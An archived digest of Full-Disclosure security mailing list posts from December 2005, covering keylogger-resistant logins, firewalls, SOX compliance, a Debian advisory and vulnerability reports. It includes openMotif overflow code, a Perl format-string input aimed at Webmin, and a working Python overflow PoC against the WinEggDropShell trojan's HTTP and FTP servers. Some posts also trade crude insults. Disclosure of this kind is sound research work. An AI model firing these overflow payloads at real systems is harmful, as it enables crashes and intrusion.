<438F96A9.70705@randomvoids.com> <439057F7.880.2CF3274F@gmail.com> Message-ID: <228735040512011739n42db6d06l82f2f20933b0c6a8@mail.gmail.com> Nick Fitzgerald wrote: You are deeply confused if you think "is totally trivial and hasn't been attacked _yet_" is in any meaningful way "more secure" than "is equally trivial and has already been broken". And if that was what I was talking about, fair enough, but seeing as I'm not ... all I was suggesting was something to help with the situation where what was being employed was a compromise that had a) a keystroke logger, and b) click hotspot screenshot mechanism. It obviously (and though you did seem to have read the entire post, thanks for that, you missed that I was at least implying exactly this) doesn't help at all if you are dealing with a more complex problem than that. I probably didn't make that clear as I pretty much thought that was a given. Some said "an onscreen random keypad" and others replied "10 x 10px hotspot screenshots", so that's the exact problem I looked at one possible way of addressing that particular and limited problem. At no time did I suggest that it helped with other problems that may be present, or made the solution somehow now magically secure. I also don't see how having a button change to be blank after mousing over it effects people with fine motor skills. The whole keyboard yes, a single button, no. Seriously visually impaired people will have problems with *any* kind of online keypad that is trying to obfuscate what the buttons do apart from what they look like (because you would be removing the tags used by the browser for accessibility purposes anyway). There is NO solution that will fully protect any login system against a compromised machine if that machine is being monitored and the compromise in place is being dynamically updated to suit the needs of the attacker. That is also a given. It may on the other hand help if you are dealing with a machine that has a piece of malware on it that installed a keystroke logger that is capable of hotspot screenshots and is not dynamically updating. It also may make the output from the machine uninteresting enough to the attacker to not bother trying to further compromise the machine in question to install things to do the more complex forms of attack that you are talking about. (Note, I didn't feel the need to once insult you or "strong arm" you into being quiet. You are obviously an extremely intelligent and knowledgeable guy, with a lot of experience in this area, why the need for the attitude?) Z. From malum at freeshell.org Fri Dec 2 02:08:12 2005 From: malum at freeshell.org (mary) Date: Fri, 2 Dec 2005 02:08:12 +0000 (UTC) Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133457890.12950.80.camel@localhost> References: <1133457890.12950.80.camel@localhost> Message-ID: eng.nprotect.co.kr comes to mind. -m > Hi All, > I'm looking for input on what you all believe the most common keystroke > loggers are. I've been challenged to write an authentication method (for > a web site) that can be secure while using a compromised system. > > Thanks, > Shannon From mz4ph0d at gmail.com Fri Dec 2 02:24:03 2005 From: mz4ph0d at gmail.com (mz4ph0d at gmail.com) Date: Fri, 2 Dec 2005 13:24:03 +1100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <228735040512011739n42db6d06l82f2f20933b0c6a8@mail.gmail.com> References: <438F448F.402@thievco.com> <438F96A9.70705@randomvoids.com> <439057F7.880.2CF3274F@gmail.com> <228735040512011739n42db6d06l82f2f20933b0c6a8@mail.gmail.com> Message-ID: <228735040512011824n68a7d7fdp9a8eeb538ef6b0dd@mail.gmail.com> I wrote: > I also don't see how having a button change to be blank after > mousing over it effects people with fine motor skills. Apologies, "fine motor skills" should have been "accessibility problems relating to fine motor skill deficiencies or problems". Z. From malum at freeshell.org Fri Dec 2 02:25:20 2005 From: malum at freeshell.org (mary) Date: Fri, 2 Dec 2005 02:25:20 +0000 (UTC) Subject: [Full-disclosure] Hacking Boot camps! In-Reply-To: <2be58a30511302259k5d81c595ia615671c97d87de1@mail.gmail.com> References: <78744869705CEF41A32C103C5C04F2200163A81F@phxexc1.dswa.net> <2be58a30511302259k5d81c595ia615671c97d87de1@mail.gmail.com> Message-ID: > Come on... lets go right old school. I loved and ran RA right old school? Hm, okies! ..didn't care for RA, personally - I ran Synchronet and RENEGADE. Thinking back.. Synchronet's scriptable co-sysop was a lot of fun.. -m >> Pfft.. >> >> RENEGADE all the way :> >> >> WWIV was great for modding too. Vision-X, yep.. I remember a lot of the >> 'ansi cool-kids' (or whatever...) running that. >> >> -MH >> >> On Wed, 30 Nov 2005, Christopher Carpenter wrote: >> >>> >>> Don't forget WWIV and Vision-X. :) >>> >>> >>> WildCAT BBS Anyone???? :) >>> >>> I remember playing tradewars and calling who knows where to get new text >>> files :) >>> >>> Used Tone-loC a lot more back then :) >>> >>> JP From paul at onestepsolutions.net Fri Dec 2 01:38:32 2005 From: paul at onestepsolutions.net (Paul Stephens) Date: Fri, 02 Dec 2005 12:38:32 +1100 Subject: [Full-disclosure] Software Firewalls for Windows Message-ID: <20051202123832.ad0i28vgn1cg4wko@www.onestepsolutions.net> Hi list, I've been a firm advocate of Sygate Pro for some time but as Symantec has bought and canned it I'm wondering what you guys would recommend as a replacement. >From the limited testing I've done I'm leaning toward Ghostwall for XP64 & Outpost for 32bit machines. Any suggestions welcomed. Regards Paul Stephens (Proprietor - OneStep Solutions) http://www.onestepsolutions.net/ From alert7 at xfocus.org Fri Dec 2 02:59:05 2005 From: alert7 at xfocus.org (alert7 at xfocus.org) Date: Fri, 02 Dec 2005 10:59:05 +0800 Subject: [Full-disclosure] [xfocus-SD-051202]openMotif libUil Multiple vulnerability Message-ID: <438FB879.7000702@xfocus.org> Title: [xfocus-SD-051202]openMotif-libUil-Multiple_vulnerability Affected version : openmotif 2.2.3(not got 2.2.4,so not test in openmotif 2.2.4) Product: http://www.motifzone.net/ xfocus (http://www.xfocus.org) have discovered multiple vulnerability in openmotif libUil library. details following: 1: libUil.so diag_issue_diagnostic buffer overflow Clients/uil/UilDiags.c diag_issue_diagnostic() 202 void diag_issue_diagnostic 203 ( int d_message_number, src_source_record_type *az_src_rec, 204 int l_start_column, ...) 205 206 { 207 va_list ap; /* ptr to variable length parameter */ 208 int severity; /* severity of message */ 209 int message_number; /* message number */ 210 char msg_buffer[132]; /* buffer to construct message */ 211 char ptr_buffer[buf_size]; /* buffer to construct pointer */ 212 char loc_buffer[132]; /* buffer to construct location */ 213 char src_buffer[buf_size]; /* buffer to hold source line */ ...... 293 va_start(ap, l_start_column); 294 295 #ifndef NO_MESSAGE_CATALOG 296[1.1] vsprintf( msg_buffer, 297 catgets(uil_catd, UIL_SET1, msg_cat_table[ message_number ], 298 diag_rz_msg_table[ message_number ].ac_text), 299 ap ); 300 #else 301[1.2] vsprintf( msg_buffer, 302 diag_rz_msg_table[ message_number ].ac_text, 303 ap ); 304 #endif 305 va_end(ap); [1.1][1.2] call vsprintf will cause buffer overflow if ap is user-support data,so if one local or remote application which used this library may cause execute arbitrary code . 2: libUil.so open_source_file buffer voerflow Clients/uil/UilSrcSrc.c 620 status 621 open_source_file( XmConst char *c_file_name, 622 uil_fcb_type *az_fcb, 623 src_source_buffer_type *az_source_buffer ) 624 { 625 626 static unsigned short main_dir_len = 0; 627 boolean main_file; 628 int i; /* loop index through include files */ 629 char buffer[256]; 630 631 632 /* place the file name in the expanded_name buffer */ 633 634[2.1] strcpy(buffer, c_file_name); 635 636 /* Determine if this is the main file or an include file. */ 637 638 main_file = (main_fcb == NULL); 639 [2.1] like above --EOF From aditya.deshmukh at online.gateway.strangled.net Fri Dec 2 03:55:45 2005 From: aditya.deshmukh at online.gateway.strangled.net (Aditya Deshmukh) Date: Fri, 2 Dec 2005 09:25:45 +0530 Subject: [Full-disclosure] Re: SOX whistleblowers' clause Compliance In-Reply-To: Message-ID: See below marc email part >> Aditya Deshmukh [aditya.deshmukh at online.gateway.strangled.net] wrote: >> >>If you read the last line in para 6 you will find that anon >> mailbox is >> a requirement for SOX compliance. >> >> >And mailbox was ment for email Michael :) >> >> >But I think that "with a post and some concrete" mailbox >> will be Indeed >> be far more secure..... > From: Madison, Marc [mailto:mmadison at fnni.com] > IANAL, But IMO use an Intranet web page that allows employees > to submit > anonymous html post to the web server via html. Now if your security > policy is pervasive then surely auditing is enabled on all > your systems, > thus removing any anonymity this would have provided. Have you > considered, dare I say, outsourcing? I only say this since > part of the > requirement calls for the company to provide sufficient anonymity to > individuals reporting issues. By the way the SOX whistleblowers > requirements have already been challenged in court so there might be > precedence on what is sufficient. You must be a mind reader - you just read my mind. And google search shows Some email providers giving out this service for about US$ 89.99. Maybe that is the best solution after all... You don't break your security policy and the auditors are also happy. ________________________________________________________________________ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) From fergdawg at netzero.net Fri Dec 2 03:05:21 2005 From: fergdawg at netzero.net (Fergie) Date: Fri, 2 Dec 2005 03:05:21 GMT Subject: [Full-disclosure] Software Firewalls for Windows Message-ID: <20051201.190550.21024.26035@webmail16.lax.untd.com> An embedded and charset-unspecified text was scrubbed... Name: not available Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/b6795d4d/attachment.ksh From fdlist at digitaloffense.net Fri Dec 2 04:10:00 2005 From: fdlist at digitaloffense.net (H D Moore) Date: Thu, 1 Dec 2005 22:10:00 -0600 Subject: [Full-disclosure] Webmin miniserv.pl format string vulnerability In-Reply-To: <200511291115.21065.fdlist@digitaloffense.net> References: <20051129100710.GB12724@5002.rapturesecurity.org> <200511291115.21065.fdlist@digitaloffense.net> Message-ID: <200512012210.00213.fdlist@digitaloffense.net> As many folks have pointed out and consistent with the recent Dyad advisory, these bugs are indeed exploitable. I only mention this because a reporter quoted someone who quoted my original message and then used it to downplay the severity of the problem. $ perl -e 'printf("%2918905856\$vs")' -HD On Tuesday 29 November 2005 11:15, H D Moore wrote: > On Tuesday 29 November 2005 04:07, advisory at dyadsecurity.com wrote: > > [snip ] so so if remote code execution is successful, it would > > lead to a full remote root compromise in a standard configuration. From aditya.deshmukh at online.gateway.strangled.net Fri Dec 2 04:15:19 2005 From: aditya.deshmukh at online.gateway.strangled.net (Aditya Deshmukh) Date: Fri, 2 Dec 2005 09:45:19 +0530 Subject: [Full-disclosure] Re: SOX whistleblowers' clause Compliance In-Reply-To: <2be58a30511302258i455d92f0o8d3fa7a5a4884bea@mail.gmail.com> Message-ID: > > > Why cant you use google to find out this ? > > The same reason you can't use Google and find your answer fuckbag. Are you n3td3v ? > > > *In the para 4* > > "Protecting whistleblowers is an essential component of an ethical > > and open work environment." > > No mention of an anon email address here. > > > > *In para 6* <----- this is the one that you want > > several options for employees to raise concerns, including the > > option of raising a concern anonymously. > > Again, not specifying email. A simple drop box in the lunchroom > facilitates this. "A simple drop box in the lunchroom" will not work when you have a client that is big enough to have branches distributed all over the place. Anon Email is the best solution for this - you don't have to manually Check the boxes in all the locations with the headache of keeping the Contents of the box classified. And if you had read my first email *and* comprehended what I had asked you would have not being writing the mail that I am responding to. From paul at onestepsolutions.net Fri Dec 2 04:50:19 2005 From: paul at onestepsolutions.net (Paul Stephens) Date: Fri, 02 Dec 2005 15:50:19 +1100 Subject: [Full-disclosure] Software firewalls for Windows Message-ID: <20051202155019.m3fphnzagbk0so80@www.onestepsolutions.net> Is there something wrong with Zone Alarm? ;-) > > Also, it was just announced today by Sunbelt Software that they > are picking up Kerio. > > http://www.sunbelt-software.com/Press.cfm?id=134 > > - ferg Hi Fergie, I quite like the fact that Kerrio is light on sys resources as not all my clients have grunty machines. However, even though I'm no l33t haXor (more a mere script kiddie with canned pen testing tools) I've been able to defeat it. As far as Zone Alarm is concerned: it is more demanding on sys resources and not as configurable as Sygate Pro, or as informative as to potential malicious action. I've only just started testing Outpost (on a 32bit machine) and Ghostwall (on a 64bit machine) but so far I'm quite impressed. However, the collective experience of this list is far greater than I could achieve in a lifetime so I guess I'm asking what others have found to be the most difficult to breach and featuresome. Regards Paul Stephens (Proprietor - OneStep Solutions) http://www.onestepsolutions.net/ From exibar at thelair.com Fri Dec 2 04:48:35 2005 From: exibar at thelair.com (Exibar) Date: Thu, 1 Dec 2005 23:48:35 -0500 Subject: [spam] Re: [Full-disclosure] Hacking Boot camps! In-Reply-To: Message-ID: synchronet! Me too! I loved my Synchronet BBS back in the day :-) RIP graphic support, all the doors you could muster... I had forgotten how much fun the scriptable co-sysop was :-) Exibar (Exibar's Lair BBS (whoop whoop!) > -----Original Message----- > From: mary [mailto:malum at freeshell.org] > Sent: Thursday, December 01, 2005 9:25 PM > To: full-disclosure at lists.grok.org.uk > Subject: [spam] Re: [Full-disclosure] Hacking Boot camps! > > > > Come on... lets go right old school. I loved and ran RA > > right old school? Hm, okies! ..didn't care for RA, personally - I ran > Synchronet and RENEGADE. Thinking back.. Synchronet's scriptable > co-sysop > was a lot of fun.. > > -m > > >> Pfft.. > >> > >> RENEGADE all the way :> > >> > >> WWIV was great for modding too. Vision-X, yep.. I remember a > lot of the > >> 'ansi cool-kids' (or whatever...) running that. > >> > >> -MH > >> > >> On Wed, 30 Nov 2005, Christopher Carpenter wrote: > >> > >>> > >>> Don't forget WWIV and Vision-X. :) > >>> > >>> > >>> WildCAT BBS Anyone???? :) > >>> > >>> I remember playing tradewars and calling who knows where to > get new text > >>> files :) > >>> > >>> Used Tone-loC a lot more back then :) > >>> > >>> JP > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > From aditya.deshmukh at online.gateway.strangled.net Fri Dec 2 04:52:06 2005 From: aditya.deshmukh at online.gateway.strangled.net (Aditya Deshmukh) Date: Fri, 2 Dec 2005 10:22:06 +0530 Subject: [Full-disclosure] Software Firewalls for Windows In-Reply-To: <20051202123832.ad0i28vgn1cg4wko@www.onestepsolutions.net> Message-ID: > Hi list, I've been a firm advocate of Sygate Pro for some > time but as Symantec > has bought and canned it I'm wondering what you guys would > recommend as a > replacement. Tiny Firewall 2005 works for both 64 and 32 bit machines And is good - I have been using in since version 2.1.5 And now its 6.5.xx From aditya.deshmukh at online.gateway.strangled.net Fri Dec 2 05:04:08 2005 From: aditya.deshmukh at online.gateway.strangled.net (Aditya Deshmukh) Date: Fri, 2 Dec 2005 10:34:08 +0530 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133457890.12950.80.camel@localhost> Message-ID: > I'm looking for input on what you all believe the most common > keystroke loggers are. http://keylogger.org/ claims to be an independent testing site for all keyloggers, but they have all the old versions of the Keylogger. You can use this site as starting point for your search. Visit the home pages of all the keylogger software creators And download the latest versions. > I've been challenged to write an authentication method > (for a web site) that can be secure while using a > compromised system. First off, look at the challenge in this way : 1. what is the website about ? 2. does it really need so much security ? 3. if it does then keep in mind about the Man in the middle attacks 4. when a client is compromised all the Data must be assumed to be stolen. If I were in your place I would design a system where the clients were auth with x.509 certs on the clients ie "client certs" with "user auth" purpose defined in them and store them on something like a hardware token, which required a pin to unlock. and send something signed with a client cert as a part of the login process before any kind of server response is even issued. This way the bar of security is raised a bit further. also I am a very big fan of hardware tokens that generate challenge response from random numbers... But they tend to be quite costly. But worth the cost if your application requires it. ________________________________________________________________________ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) From aditya.deshmukh at online.gateway.strangled.net Fri Dec 2 05:05:25 2005 From: aditya.deshmukh at online.gateway.strangled.net (Aditya Deshmukh) Date: Fri, 2 Dec 2005 10:35:25 +0530 Subject: [Full-disclosure] Re: Most common keystroke loggers? In-Reply-To: Message-ID: > How about one-time passwords? Just go ahead and *let* them > keylog it all > they like; by the time they've snarfed a pw, it's no use any > more. (See S/Key for more details.) Please no one time passwords: they are a nightmare to manage ________________________________________________________________________ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) From aditya.deshmukh at online.gateway.strangled.net Fri Dec 2 05:08:36 2005 From: aditya.deshmukh at online.gateway.strangled.net (Aditya Deshmukh) Date: Fri, 2 Dec 2005 10:38:36 +0530 Subject: [Full-disclosure] Support_388945a0 account in Win XP/2003 In-Reply-To: <438E9EEE.9070301@elforsoft.com> Message-ID: > > > That is a "help and support account" that you should disable. > > Also set very long random password and forget it. > I prefer simply delete it. Good choice? > > But I heard a rumours that this account can be activated remotely > without user's aware decision and used for Remote Assistance (e.g. > capturing a screen and even controlling input). I would not know about this unless I test it out, but from the top of my mind : you have to start the service for something like this Deleting it might cause problems "help and support" just deny the account all kinds of privs and it would no longer matter. ________________________________________________________________________ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) From exibar at thelair.com Fri Dec 2 05:29:27 2005 From: exibar at thelair.com (Exibar) Date: Fri, 2 Dec 2005 00:29:27 -0500 Subject: [inbox] Re: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <438F96A9.70705@randomvoids.com> Message-ID: nah, screen grabber and keylogger installed on system, compromised password. Biometrics, SecurID, one time password, usb key fob, actual physical key, something that is not on the system is what would be needed to be secure... perhaps not totally secure, but pretty damn secure.... using more than just one of the above too.... a physical key/credit card, USB key, and SecurID used together would be pretty secure... throw in a finger print reader too, why not... hell, DNA scanner like in Gataca too.... Mike B > -----Original Message----- > From: Kyle Lutze [mailto:kyle at randomvoids.com] > Sent: Thursday, December 01, 2005 7:35 PM > To: full-disclosure at lists.grok.org.uk > Subject: [inbox] Re: [Full-disclosure] Most common keystroke loggers? > > > Blue Boar wrote: > > Shannon Johnston wrote: > > > >> Hi All, > >> I'm looking for input on what you all believe the most common keystroke > >> loggers are. I've been challenged to write an authentication > method (for > >> a web site) that can be secure while using a compromised system. > > > > > > I don't think that's possible for all compromise situations, given > > today's desktop OS software. It might be possible with a > Palladium-like > > system (and you trust that the secure side isn't compromised) and/or a > > hardware assist that doesn't trust the host OS (think small > USB-attached > > computer on a stick.) > > > > However, given your query, if you simply want to play the known-threats > > game, you can just require that the Client have up-to-date AV and > > antispyware software, and scans clean. That's a little orthogonal to > > the issue of trying to be secure in the face of a keylogger installed, > > but probably a better thing to shoot for. > > > > If, for some reason, you only care about the case where a > "keylogger" is > > installed, then you can go with some scheme like making the user pick > > numbers of a randomly-scrambled keypad on the screen, with the mouse. > > > > Note, however, that "keyloggers" that grab some portion of the screen > > surrounding the mouse pointer every time you click have already been > > observed in the wild. They are designed to specifically defeat this > > kind of mechanism. > > > Actually, I think there's a relatively easy solution, make it so every > single time they want to login, have a different set of characters line > up to their password. > That didn't make much sense, here's a good example > > say somebody's password is foobar, on screen there would be a page that > shows the new alignment of characters,such as saying a=c, d=3, b=z, etc. > so instead of typing foobar the password they would type in for that > session would be hnnzck. > > The next time the screen came up, it would be a=n, b=l, etc. and the > password they would enter would be something else. Then, if the computer > had a keylogger, not too much anybody could do with that info. > > Kyle > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > From smaillist at gmail.com Fri Dec 2 05:47:49 2005 From: smaillist at gmail.com (Sowhat) Date: Fri, 2 Dec 2005 13:47:49 +0800 Subject: [Full-disclosure] WinEggDropShell Multiple Remote Stack Overflow Message-ID: WinEggDropShell Multiple Remote Stack Overflow by Sowhat 2005.12.02 http://secway.org/advisory/AD20051202.txt http://secway.org/exploit/wineggdropshell_bof.py.txt Affected: WinEggDropShell Eterntiy version (1.7) Other version may be vulnerable toooooo Overview: WinEggDropShell is a popular Chinese RAT (remote access trojan). WineggDropShell provide HTTP Proxy/Socks Proxy/HTTP Server/FTP Server. for more information, Goooooooooooooogle... Multiple preauth stack overflow found in the HTTP/FTP server can be used to execute arbitrary command or D0S (blue screen, yes, it's cool ;) Vulnerability: 1. FTP USER bof .text:100027BD push offset aUser ; "USER" .text:100027C2 call _strlen .text:100027C7 add esp, 4 .text:100027CA lea edi, [ebp+eax-103h] .text:100027D1 push edi .text:100027D2 push offset aS ; "%s" .text:100027D7 lea edi, [ebp+var_208] .text:100027DD push edi ; char * .text:100027DE call _sprintf ; emmmmm, ;) _ReceiveSocketBuffer can maximum recv 0x200h, but [ebp+var_208] is a 0x104h buffer. 2. FTP Server Pass Command ............. 3. HTTP GET stack overflow! GET /A*260 PoC: http://secway.org/exploit/wineggdropshell_bof.py.txt Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;) Reference: [1] https://www.openrce.org/articles/full_view/18 [2] http://www.ccc.de/congress/2005/ [3] http://secway.org #!/usr/bin/python # WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC # HTTP Server "GET" && FTP Server "USER" "PASS" command # Bug Discoverd and coded by Sowhat # Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;) # http://secway.org # 2005-10-11 # Affected: # WinEggDropShell Eterntiy version # Other version may be vulnerable toooooo import sys import string import socket if (len(sys.argv) != 4): print "##########################################################################" print "# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC #" print "# This Poc will BOD the vulnerable target #" print "# Bug Discoverd and coded by Sowhat #" print "# http://secway.org #" print "##########################################################################" print "\nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Port\n" print "Example: \n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80" print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21" sys.exit(0) host = sys.argv[2] port = string.atoi(sys.argv[3]) if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")): request = "USER " + 'A'*512 + "\r" if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")): request = "GET /" + 'A'*512 + " HTTP/1.1 \r\n" exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM) exp.connect((host,port)) exp.send(request) ---EOF----- -- Sowhat http://secway.org "Life is like a bug, Do you know how to exploit it ?" From joey at infodrom.org Fri Dec 2 06:35:30 2005 From: joey at infodrom.org (Martin Schulze) Date: Fri, 2 Dec 2005 07:35:30 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 915-1] New helix-player packages fix arbitrary code execution Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 915-1 security at debian.org http://www.debian.org/security/ Martin Schulze December 2nd, 2005 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : helix-player Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2005-2629 BugTraq ID : 15381 An integer overflow has been discovered in helix-player, the helix audio and video player. This flaw could allow a remote attacker to run arbitrary code on a victims computer by supplying a specially crafted network resource. This vulnerability is fixed by version 1.0.6-1 in unstable. Helix-player is not currently in the testing distribution. The old stable distribution (woody) does not contain a helix-player package. For the stable distribution (sarge) these problems have been fixed in version 1.0.4-1sarge2. For the unstable distribution (sid) these problems have been fixed in version 1.0.6-1. We recommend that you upgrade your helix-player package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge2.dsc Size/MD5 checksum: 908 5abe49b8d746b78b1f70016382d44a35 http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge2.diff.gz Size/MD5 checksum: 9113 b7103af4ca93cb52cd548a4f7da43c3b http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4.orig.tar.gz Size/MD5 checksum: 18044552 a277710be35426b317869503a4ad36d7 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge2_i386.deb Size/MD5 checksum: 4289142 afe49d505b51edefe6b66e92720e9a62 PowerPC architecture: http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge2_powerpc.deb Size/MD5 checksum: 4415648 9a9ad7733abed7ffcd6c69ce366d576c These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDj+sxW5ql+IAeqTIRAjVHAJ974CUfmj+F9Acw124mv/KrKpkcLACfcgHJ ldeYb42HgSrGdj/KtTkdKsw= =zqfg -----END PGP SIGNATURE----- From CNQQTROVMYSY at spammotel.com Fri Dec 2 06:28:28 2005 From: CNQQTROVMYSY at spammotel.com (CNQQTROVMYSY at spammotel.com) Date: Fri, 02 Dec 2005 07:28:28 +0100 Subject: [Full-disclosure] (no subject) Message-ID: <1133506223.CNQQTROVMYSY@spammotel.com> The original message was received Mon, 21 Nov 2005 10:10:58 +0100 from - ----- The following address(es) had permanent fatal errors ----- ; originally to CNQQTROVMYSY at spammotel.com (unrecoverable error) The mail system encountered a delivery failure, code -11. This failure could be due to circumstances out of its control, please check the transcript for details -------------- next part -------------- An embedded message was scrubbed... From: joey at infodrom.org (Martin Schulze) Subject: [Full-Disc]: [Full-disclosure] [SECURITY] [DSA 900-2] New fetchmail packages fix Date: Mon, 21 Nov 2005 10:14:03 +0100 (CET) Size: 4419 Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/acb32902/attachment.mht From lionel.ferette at belnet.be Fri Dec 2 07:04:44 2005 From: lionel.ferette at belnet.be (Lionel Ferette) Date: Fri, 2 Dec 2005 08:04:44 +0100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <200512011757.jB1HvHmn021363@turing-police.cc.vt.edu> References: <1133457890.12950.80.camel@localhost> <200512011757.jB1HvHmn021363@turing-police.cc.vt.edu> Message-ID: <200512020804.50762.lionel.ferette@belnet.be> In the wise words of Valdis.Kletnieks at vt.edu, on Thursday 01 December 2005 18:57: [SNIP] > Using crypto all the way from the web server to a smart-card (so all the > compromised system can see is encrypted data it can't get the key for) can > help yere. Even then, you would need a card reader with integrated pinpad. Otherwise, the keylogger can still sniff the PIN code entry - and then generate any signature it wants by accessing the PC/SC layer directly (been there, done that). Lionel -- "To understand how progress failed to make our lives easier, please press 3" Lionel Ferette BELNET CERT Coordinator Tel: +32 2 7903385 http://cert.belnet.be/ Fax: +32 2 7903375 PGP Key Id: 0x5662FD4B -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/67823d50/attachment.bin From infosecbofh at gmail.com Fri Dec 2 08:22:17 2005 From: infosecbofh at gmail.com (InfoSecBOFH) Date: Fri, 2 Dec 2005 00:22:17 -0800 Subject: [Full-disclosure] Re: SOX whistleblowers' clause Compliance In-Reply-To: References: <2be58a30511302258i455d92f0o8d3fa7a5a4884bea@mail.gmail.com> Message-ID: <2be58a30512020022q7bd85952o50b5084be7d5b0e4@mail.gmail.com> And if you had used Google in the first place shitbreath, You would not have written your original email. Oh and I am not n3td3v. My morning shits are smarter than n3td3v and contain more intelligence. From infosecbofh at gmail.com Fri Dec 2 08:23:50 2005 From: infosecbofh at gmail.com (InfoSecBOFH) Date: Fri, 2 Dec 2005 00:23:50 -0800 Subject: [Full-disclosure] Fwd: confirm Message-ID: <2be58a30512020023t3af41b62m4b371632e4c8c843@mail.gmail.com> Ummm yeah,... nice try fuckbags. ---------- Forwarded message ---------- From: full-disclosure-request at lists.grok.org.uk Date: Dec 1, 2005 11:45 PM Subject: confirm To: infosecbofh at gmail.com Mailing list removal confirmation notice for mailing list Full-Disclosure We have received a request for the removal of your email address, "infosecbofh at gmail.com" from the full-disclosure at lists.grok.org.uk mailing list. To confirm that you want to be removed from this mailing list, simply reply to this message, keeping the Subject: header intact. Or visit this web page: https://lists.grok.org.uk/mailman/confirm/full-disclosure/ Or include the following line -- and only the following line -- in a message to full-disclosure-request at lists.grok.org.uk: confirm Note that simply sending a `reply' to this message should work from most mail readers, since that usually leaves the Subject: line in the right form (additional "Re:" text in the Subject: is okay). If you do not wish to be removed from this list, please simply disregard this message. If you think you are being maliciously removed from the list, or have any other questions, send them to full-disclosure-owner at lists.grok.org.uk. From manuel.bolzoni at gmail.com Fri Dec 2 08:29:28 2005 From: manuel.bolzoni at gmail.com (Manuel Bolzoni) Date: Fri, 2 Dec 2005 09:29:28 +0100 Subject: [Full-disclosure] Software Firewalls for Windows References: <20051202123832.ad0i28vgn1cg4wko@www.onestepsolutions.net> Message-ID: <004401c5f71a$84ac1e50$552f0357@vlad> 8Signs Firewall http://www.consealfirewall.com/ ----- Original Message ----- From: "Paul Stephens" To: Sent: Friday, December 02, 2005 2:38 AM Subject: [Full-disclosure] Software Firewalls for Windows > Hi list, I've been a firm advocate of Sygate Pro for some time but as Symantec > has bought and canned it I'm wondering what you guys would recommend as a > replacement. > > >From the limited testing I've done I'm leaning toward Ghostwall for XP64 & > Outpost for 32bit machines. > > Any suggestions welcomed. > > Regards > > Paul Stephens > (Proprietor - OneStep Solutions) > http://www.onestepsolutions.net/ > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From coley at mitre.org Fri Dec 2 08:56:14 2005 From: coley at mitre.org (Steven M. Christey) Date: Fri, 2 Dec 2005 03:56:14 -0500 (EST) Subject: [Full-disclosure] Format String Vulnerabilities in Perl Programs Message-ID: <200512020856.jB28uEFR011262@linus.mitre.org> *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* Format String Vulnerabilities in Perl Programs *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* Author: Steve Christey Date: December 2, 2005 ********************************************************************** Table of Contents ********************************************************************** 1. Synopsis 2. Relevant History and Credits 3. Attack and Impact Details 4. Some Discussion on Format Strings and the Taint Checker 5. Real-World Vulnerable Program Examples 6. Avoiding Format String Vulnerabilities During Development 7. Suggestions for Further Research 8. Demonstration Programs 9. References 10. Disclosure History ********************************************************************** 1. Synopsis ********************************************************************** Format string vulnerabilities in C programs have been studied extensively in recent years. The focus has been on the execution of arbitrary code, although other effects are possible. For many other programming languages, format string vulnerabilities are also possible. Given the lack of attention to other languages, it is highly likely that a large number of applications have these issues even when they have been audited for other types of vulnerabilities. For any language that supports format strings, applications that are written in that language could be subject to format string vulnerabilities. The impact is specific to the behaviors that are supported by the format strings, and their interaction with language internals. In recent 